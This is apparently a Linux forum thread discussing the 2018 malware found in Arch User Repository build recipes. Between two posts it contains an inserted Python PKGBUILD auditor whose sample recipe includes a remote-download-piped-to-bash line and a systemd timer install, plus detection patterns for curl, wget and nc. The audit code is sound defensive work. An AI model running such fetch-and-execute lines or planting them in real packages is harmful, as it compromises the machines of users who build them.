Arch User Repository compromised. Malware added

greengeek
Posts: 5789
Joined: Tue 20 Jul 2010, 09:34
Location: Republic of Novo Zelande

Arch User Repository compromised. Malware added

#1 Post by greengeek »

The Arch User Repository has been compromised with the addition of some malware, as discussed here:
https://nakedsecurity.sophos.com/2018/0 ... h-malware/

Seems as if the Arch admins are not overly concerned - basically stating that any repository can become contaminated and it is a case of "buyer beware - if you don't trust it don't install it."

Another timely reminder that adding new software (or allowing updates to previous software or system files) opens the door to increased risk.

spiritwild
Posts: 181
Joined: Mon 03 Oct 2016, 10:06

#2 Post by spiritwild »

So..... Per the article, ARCH people think they are tech gods?
Is their response or lack of concern a display of arrogance or what?

8Geee
Posts: 2181
Joined: Mon 12 May 2008, 11:29
Location: N.E. USA

#3 Post by 8Geee »

Wow, The admins have been compromised, too :shock:
Linux user #498913 "Some people need to reimagine their thinking."
"Zuckerberg: a large city inhabited by mentally challenged people."

anikin
Posts: 994
Joined: Thu 10 May 2012, 06:16

#4 Post by anikin »

What exactly has been compromised?

AUR (Arch User Repository) is an unsupported repository, where untrusted users publish their recipes/build scripts/PKGBUILD, like for example this one:
https://aur.archlinux.org/packages/palemoon/
https://aur.archlinux.org/cgit/aur.git/ ... h=palemoon

There are no binaries there - only recipes. Embarrassing - yes. Compromised - hardly.

scsijon
Posts: 1596
Joined: Thu 24 May 2007, 03:59
Location: the australian mallee

#5 Post by scsijon »

Blame is being placed on systemd

quotes:

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

looks like systemd makes it easier for compromises - one platform (systemdOS) one payload…


and a "few" others.

Be careful folks....
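The two technical points in this thread, that the AUR holds only build recipes (PKGBUILDs) rather than binaries, and the article's description of a build step that used curl to pull a script from a remote site and then touched systemd, suggest the check a practitioner would actually run before building an AUR package: read the PKGBUILD for network fetches outside the source=() array, for content piped straight into a shell, and for files dropped into systemd unit directories. The script below is an added example written for this page; it is not code from the thread, from the Sophos article or from the Arch project, and the PKGBUILD it scans is constructed for illustration and is not the modified acroread recipe.

```python
import re

# Constructed sample recipe for this example only. It is NOT the modified
# acroread PKGBUILD from the incident; it merely has the shape the article
# describes: a network fetch inside build() and a systemd unit being
# installed by package().
SAMPLE_PKGBUILD = r"""
pkgname=examplepkg
pkgver=1.0
pkgrel=2
source=("https://example.org/examplepkg-$pkgver.tar.gz")
sha256sums=('SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  curl -s https://example.invalid/x | bash
  make
}

package() {
  make DESTDIR="$pkgdir" install
  install -Dm644 "$srcdir/evil.timer" "$pkgdir/usr/lib/systemd/system/evil.timer"
}
"""

# Commands that reach the network. Legitimate downloads belong in source=(),
# where makepkg verifies them against the checksum arrays; a fetch inside
# build()/package() bypasses that verification entirely.
NETWORK_CMDS = re.compile(
    r"\b(curl|wget|git\s+clone|git\s+pull|pip\s+install|npm\s+install|scp|nc)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba)?sh\b")
SYSTEMD_PATHS = re.compile(r"/(usr/lib|etc)/systemd/(system|user)/")
# 'SKIP' is legitimate for VCS sources pinned to a commit, so this is a
# prompt to look, not proof of anything.
CHECKSUM_SKIP = re.compile(r"^(md5|sha\d+|b2)sums\s*=\s*\(.*'SKIP'", re.M)


def parse_functions(text):
    """Return {name: [(lineno, line), ...]} for top-level bash-style functions.

    Assumes the usual PKGBUILD layout: `name() {` at column 0 and a lone `}`
    at column 0 closing it. Nested braces are not tracked.
    """
    funcs, current = {}, None
    for lineno, line in enumerate(text.splitlines(), 1):
        m = re.match(r"^(\w+)\s*\(\)\s*\{", line)
        if m:
            current = m.group(1)
            funcs[current] = []
            continue
        if current and line.rstrip() == "}":
            current = None
            continue
        if current:
            funcs[current].append((lineno, line))
    return funcs


def audit_pkgbuild(text):
    """Return a list of (function, lineno, reason) findings for one PKGBUILD."""
    findings = []
    if CHECKSUM_SKIP.search(text):
        findings.append(("(global)", 0,
                         "checksum set to SKIP; source integrity is not verified"))
    for name, lines in parse_functions(text).items():
        for lineno, line in lines:
            stripped = line.split("#", 1)[0]  # ignore trailing shell comments
            if NETWORK_CMDS.search(stripped):
                findings.append((name, lineno, "network fetch outside source=()"))
            if PIPE_TO_SHELL.search(stripped):
                findings.append((name, lineno, "remote content piped into a shell"))
            if SYSTEMD_PATHS.search(stripped):
                findings.append((name, lineno,
                                 "installs a systemd unit; review it before installing as root"))
    return findings


if __name__ == "__main__":
    for fn, lineno, reason in audit_pkgbuild(SAMPLE_PKGBUILD):
        print(f"{fn}:{lineno}: {reason}")
```

Run it against the PKGBUILD in a cloned AUR directory by replacing SAMPLE_PKGBUILD with the file's contents. On the privilege point raised later in the thread: makepkg refuses to run as root, so the fetch-and-run step in build() executes with the building user's rights; the resulting package is then installed by pacman as root, which is where an installed systemd unit or the package's .install script gains privilege. The audit is a reading aid, not a sandbox: a recipe can hide a fetch behind a variable or a helper script in the source tarball, so an unflagged PKGBUILD still deserves a look.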

wiak
Posts: 2040
Joined: Tue 11 Dec 2007, 05:12
Location: not Bulgaria

#6 Post by wiak »

scsijon wrote:looks like systemd makes it easier for compromises - one platform (systemdOS) one payload.
Perhaps, but I don't see how systemd components are easier to compromise than systeminit components - main security issue would seem to be that of the malware app user running it whilst having root user permissions surely?

In the Puppy Linux world, dotpets are put up here and there by anyone who feels fit. Only well-tested and wanted ones end up in official repositories, that's true, but the murga forum site isn't so much different from AUR, which is also for user recipes (EDIT: except that the murga forum is less secure since it includes binaries and more often quite complex shell-script apps, not just recipes).
wiak

spiritwild
Posts: 181
Joined: Mon 03 Oct 2016, 10:06

#7 Post by spiritwild »

I remember, about 20 years ago on a nascar forum, someone thought they would open a file account and give all the users the name and password info in a public message.

I was blown away and I thought it was the worst idea on the entire planet. The internet had not been around that long so maybe people still felt safe in their little shell of fans. Coming from a BBS background it was the same as giving everyone on usenet my sysop password.

I made it known that I thought that was not a good idea because of obvious reasons but my concerns fell on deaf ears.

When it was hacked and someone changed the password, they all blamed me. Because no one else on the whole damn planet would have thought to walk through an open door and steal the goodies. Since I had concerns, I invited the crime to happen. I was amused.

Ah the good ol days.
